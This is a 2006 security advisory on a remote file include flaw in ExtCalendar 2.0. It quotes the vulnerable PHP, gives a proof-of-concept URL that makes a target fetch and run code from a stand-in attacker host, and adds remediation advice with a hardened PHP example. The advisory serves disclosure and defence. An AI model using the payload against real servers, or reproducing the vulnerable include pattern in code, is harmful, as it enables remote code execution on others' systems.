Echo Security Advisory 2006.36

2006-07-09T00:00:00
ID PACKETSTORM:48097
Type packetstorm
Reporter Echo Security
Modified 2006-07-09T00:00:00

Description

                                        
                                            `ECHO.OR.ID  
ECHO_ADV_36$2006  
  
---------------------------------------------------------------------------  
[ECHO_ADV_36$2006] ExtCalendar <== v2.0 Remote File Include Vulnerabilities  
---------------------------------------------------------------------------  
  
Author : Ahmad Maulana a.k.a Matdhule  
Date : July 07th 2006  
Location : Indonesia, Jakarta  
Web : http://advisories.echo.or.id/adv/adv36-matdhule-2006.txt  
Critical Lvl : Highly critical  
Impact : System access  
Where : From Remote  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
ExtCalendar  
  
Application : ExtCalendar  
version : 2.0  
URL : http://extcal.sourceforge.net/  
Description :  
  
ExtCalendar is a powerful multi-user web-based calendar application.   
Features include Multi-Languages, Themes, Recurrent Events, Categories,   
Users and Groups management, Environment and General Settings, Template Configuration, Product Updates.  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~~  
  
In the component folder com_extcalendar, the script extcalendar.php is vulnerable.  
  
-----------------------extcalendar.php----------------------  
....  
<?php  
// $mosConfig_absolute_path is normally set by the CMS bootstrap (configuration.php).  
// When extcalendar.php is requested directly it is still unset at this point, and  
// with register_globals=on a request parameter of the same name fills it in.  
global $mosConfig_absolute_path;  
// With allow_url_fopen=on, a URL in $mosConfig_absolute_path is fetched and executed here.  
require_once( $mosConfig_absolute_path."/components/com_extcalendar/config.inc.php" );  
require_once( $CONFIG_EXT['LIB_DIR']."mail.inc.php" );  
?>  
...  
----------------------------------------------------------  
  
The variable $mosConfig_absolute_path is used before it is initialised and is never validated.  
Under the CMS front controller (index.php) it is set by configuration.php, but when  
extcalendar.php is requested directly it is empty, and with register_globals=on PHP fills it  
from a GET, POST or cookie parameter of the same name. With allow_url_fopen=on (written  
allow_fopenurl in the original advisory), require_once() then fetches the attacker's URL and  
executes its contents as PHP on the server. No authentication is needed, and the attacker gets  
code execution as the web server user. On PHP 5.2 and later the separate allow_url_include  
directive must also be on for include/require to accept URLs.  
  
Proof Of Concept:  
~~~~~~~~~~~~~~~~  
  
http://[target]/[path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://attacker.com/evil.txt?  
  
The trailing "?" turns the string the script appends (/components/com_extcalendar/config.inc.php)  
into a query string, so the request still resolves to evil.txt on the attacker's host and the  
PHP code in that file runs on the target.  
  
Solution:  
~~~~~~~~  
  
Do not take the base path from a variable a request can set. Guard extcalendar.php so it runs  
only under the CMS front controller (defined('_VALID_MOS') or die(...) in Mambo/Joomla 1.0),  
derive the include path from dirname(__FILE__) instead of $mosConfig_absolute_path, and check  
that $CONFIG_EXT['LIB_DIR'] is a local directory before including from it. Server side, set  
register_globals=Off and, where remote fetches are not needed, allow_url_fopen=Off in php.ini;  
these reduce exposure to this class of bug but do not replace the code fix.  
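The include pattern from the advisory beside a hardened form, as an added example that is not ExtCalendar's or Echo's own code. It assumes a Mambo/Joomla 1.0 host whose front controller defines _VALID_MOS before loading components, and that config.inc.php defines the $CONFIG_EXT array as in the advisory; the helper name extcal_safe_local_dir and the variable names are hypothetical.

```php
<?php
// Added example (not ExtCalendar's own code). Assumptions: the component runs
// under Mambo/Joomla 1.0, which defines _VALID_MOS in index.php before any
// component is loaded; config.inc.php defines $CONFIG_EXT['LIB_DIR'].
// The helper name extcal_safe_local_dir is hypothetical.

// --- Vulnerable form (as quoted in the advisory) -------------------------
// With register_globals=on a request such as
//   extcalendar.php?mosConfig_absolute_path=http://attacker.example/evil.txt?
// populates $mosConfig_absolute_path before the include runs, and with
// allow_url_fopen=on require_once() fetches and executes the remote file.
//
// global $mosConfig_absolute_path;
// require_once( $mosConfig_absolute_path."/components/com_extcalendar/config.inc.php" );
// require_once( $CONFIG_EXT['LIB_DIR']."mail.inc.php" );

// --- Hardened form --------------------------------------------------------

// 1. Refuse direct requests: only the CMS front controller defines _VALID_MOS,
//    so a direct hit on extcalendar.php dies before any include runs.
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

// 2. Never take the base path from a variable a request can set. Derive it
//    from this file's own location on disk instead.
$extcalBase = dirname(__FILE__);   // .../components/com_extcalendar

require_once($extcalBase . '/config.inc.php');

// 3. Treat the library directory from config.inc.php as untrusted as well:
//    it must be an existing local directory inside the component, never a URL.
//    Returns the resolved directory, or false if the candidate is rejected.
function extcal_safe_local_dir($candidate, $mustBeUnder)
{
    // Reject anything with a scheme prefix (http://, ftp://, php://, data:, ...).
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $candidate)) {
        return false;
    }
    $real = realpath($candidate);
    $root = realpath($mustBeUnder);
    if ($real === false || $root === false) {
        return false;
    }
    // Containment check: the resolved directory must sit at or below the root.
    // The appended separator prevents /site/lib matching /site/libraries.
    $inside = strpos($real . DIRECTORY_SEPARATOR, $root . DIRECTORY_SEPARATOR) === 0;
    return $inside ? $real : false;
}

$libDir = extcal_safe_local_dir($CONFIG_EXT['LIB_DIR'], $extcalBase);
if ($libDir === false) {
    die('ExtCalendar: invalid LIB_DIR in config.inc.php');
}
require_once($libDir . '/mail.inc.php');
?>
```

The _VALID_MOS guard alone closes the direct-request path shown in the proof of concept; the dirname(__FILE__) change removes the dependency on register_globals entirely, and the containment check on LIB_DIR stops a later configuration mistake from reintroducing a remote or out-of-tree include. Setting register_globals=Off and allow_url_fopen=Off in php.ini is still worthwhile as defence in depth.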
  
  
---------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)  
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous  
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama  
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com  
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~  
  
matdhule[at]gmail[dot]com  
  
-------------------------------- [ EOF ] ----------------------------------  